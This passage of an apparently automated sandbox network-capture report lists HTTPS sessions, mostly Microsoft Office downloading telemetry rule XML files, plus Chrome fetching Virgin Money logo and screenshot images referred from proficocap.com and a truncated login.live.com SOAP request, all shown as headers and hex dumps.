20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          55192.168.2.44981713.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:17 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:17 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:17 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 471
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                          ETag: "0x8DC582BB10C598B"
                                                                          x-ms-request-id: 3de6f1c3-b01e-003d-6e01-48d32c000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195117Z-r1cf579d778bb9vvhC1EWRs95400000005tg000000007tvb
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:17 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          56192.168.2.44981813.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:17 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:17 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:17 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 632
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                          ETag: "0x8DC582BB6E3779E"
                                                                          x-ms-request-id: 1e9ba10d-901e-0029-2907-48274a000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195117Z-r1cf579d778t5c2lhC1EWRce3w000000070000000000363f
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:17 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          57192.168.2.44981613.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:17 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:17 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:17 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 415
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                          ETag: "0x8DC582B9F6F3512"
                                                                          x-ms-request-id: 9879796e-101e-0034-5802-4896ff000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195117Z-r1cf579d778bb9vvhC1EWRs95400000005y0000000001wc2
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:17 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          58192.168.2.44981913.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:17 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:17 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:17 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 467
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                          ETag: "0x8DC582BA6C038BC"
                                                                          x-ms-request-id: c4bc35ba-101e-007a-7206-48047e000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195117Z-r1cf579d7788pwqzhC1EWRrpd800000006g0000000007wbc
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:17 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          59192.168.2.44982113.227.8.724431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:18 UTC590OUTGET /virginmoney.com HTTP/1.1
                                                                          Host: logo.clearbit.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://proficocap.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:51:20 UTC548INHTTP/1.1 200 OK
                                                                          Content-Type: image/png
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          Cache-Control: public, max-age=2592000
                                                                          Date: Sun, 08 Dec 2024 19:51:19 GMT
                                                                          x-envoy-response-flags: -
                                                                          Server: Clearbit
                                                                          strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                                          x-content-type-options: nosniff
                                                                          X-Cache: Miss from cloudfront
                                                                          Via: 1.1 0d8b4cbedd535224fcd064adb5292d3a.cloudfront.net (CloudFront)
                                                                          X-Amz-Cf-Pop: BAH53-C1
                                                                          X-Amz-Cf-Id: pTUlHCUrruUZTCzdCWF9R9mmSBCJz78OkP8n6etzNJ1TpQXqDw1_wA==
                                                                          2024-12-08 19:51:20 UTC12797INData Raw: 33 31 66 35 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 31 bc 49 44 41 54 78 9c ec bd 09 bc 5d 45 95 2f bc d6 aa aa bd cf 74 a7 dc 9b 79 20 0c 09 89 0c 81 30 09 08 82 e2 6b 05 11 b5 05 a7 d6 6e b5 b5 d1 b6 6d a7 06 ed 4f 1a b5 11 c5 b1 a5 df d7 6a a3 b4 ad d8 e2 dc 82 02 2a 83 01 1a 91 79 12 08 31 03 21 73 72 e7 33 ec bd ab 6a ad ef 57 75 ce 4d 02 be d7 3e 7f b9 37 d7 f7 fb b2 7e 27 f7 de 9c 61 9f 5d f5 af 5a f3 5a a5 45 04 0e d0 f4 11 4d f7 0d fc ff 9d 0e 00 30 cd 74 00 80 69 a6 03 00 4c 33 1d 00 60 9a e9 00 00 d3 4c 07 00 98 66 3a 00 c0 34 d3 01 00 a6 99 0e 00 30 cd 74 00 80 69 a6 03 00 4c 33 1d 00 60 9a e9 00 00 d3 4c 07 00 98 66 3a 00 c0 34 d3 01 00 a6 99 0e 00 30 cd 74 00 80 69 26 3d
                                                                          Data Ascii: 31f5PNGIHDRL\1IDATx]E/ty 0knmOj*y1!sr3jWuM>7~'a]ZZEM0tiL3`Lf:40tiL3`Lf:40ti&=
                                                                          2024-12-08 19:51:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          60192.168.2.44982234.202.133.2284431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:18 UTC601OUTGET /get/http://www.virginmoney.com HTTP/1.1
                                                                          Host: image.thum.io
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://proficocap.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:51:20 UTC268INHTTP/1.1 403
                                                                          Date: Sun, 08 Dec 2024 19:51:20 GMT
                                                                          Content-Type: image/png
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Access-Control-Allow-Origin: *
                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                          2024-12-08 19:51:20 UTC39INData Raw: 32 31 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 58 00 00 02 58 08 06 00 00 00 be 66 98 dc 0d 0a
                                                                          Data Ascii: 21PNGIHDRXXf
                                                                          2024-12-08 19:51:20 UTC6001INData Raw: 31 37 36 39 0d 0a 00 00 17 5d 49 44 41 54 78 5e ed dd d1 6e 24 39 12 24 c0 fd ff 9f be 43 62 2f b1 75 be 49 32 82 4c 69 b4 92 19 10 2f 55 ee c1 ec 1a 89 5d 98 97 fe d7 bf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: 1769]IDATx^n$9$Cb/uI2Li/U]
                                                                          2024-12-08 19:51:20 UTC17INData Raw: 63 0d 0a 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                          Data Ascii: cIENDB`
                                                                          2024-12-08 19:51:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          61192.168.2.44982420.190.147.8443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:19 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/soap+xml
                                                                          Accept: */*
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                          Content-Length: 3592
                                                                          Host: login.live.com
                                                                          2024-12-08 19:51:19 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                          2024-12-08 19:51:20 UTC569INHTTP/1.1 200 OK
                                                                          Cache-Control: no-store, no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                          Expires: Sun, 08 Dec 2024 19:50:19 GMT
                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                          x-ms-route-info: C510_BAY
                                                                          x-ms-request-id: c534c1f3-3830-468c-9178-83f2a827d984
                                                                          PPServer: PPV: 30 H: PH1PEPF0001B876 V: 0
                                                                          X-Content-Type-Options: nosniff
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          X-XSS-Protection: 1; mode=block
                                                                          Date: Sun, 08 Dec 2024 19:51:19 GMT
                                                                          Connection: close
                                                                          Content-Length: 11390
                                                                          2024-12-08 19:51:20 UTC11390INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          62192.168.2.44982513.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:19 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:20 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:19 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 407
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                          ETag: "0x8DC582BBAD04B7B"
                                                                          x-ms-request-id: b569e8fb-501e-008c-5305-48cd39000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195119Z-r1cf579d778bb9vvhC1EWRs95400000005z0000000000d9t
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:20 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          63192.168.2.44982713.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:19 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:20 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:20 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 427
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                          ETag: "0x8DC582BA310DA18"
                                                                          x-ms-request-id: 682fb484-401e-0083-5904-48075c000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195120Z-r1cf579d778xq4f9hC1EWRx41g000000063g000000004zt9
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:20 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          64192.168.2.44982613.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:19 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:20 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:20 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 486
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                          ETag: "0x8DC582BB344914B"
                                                                          x-ms-request-id: 3fcfbabf-e01e-0052-0903-48d9df000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195120Z-r1cf579d778mvsklhC1EWRkavg00000006h0000000005gp3
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
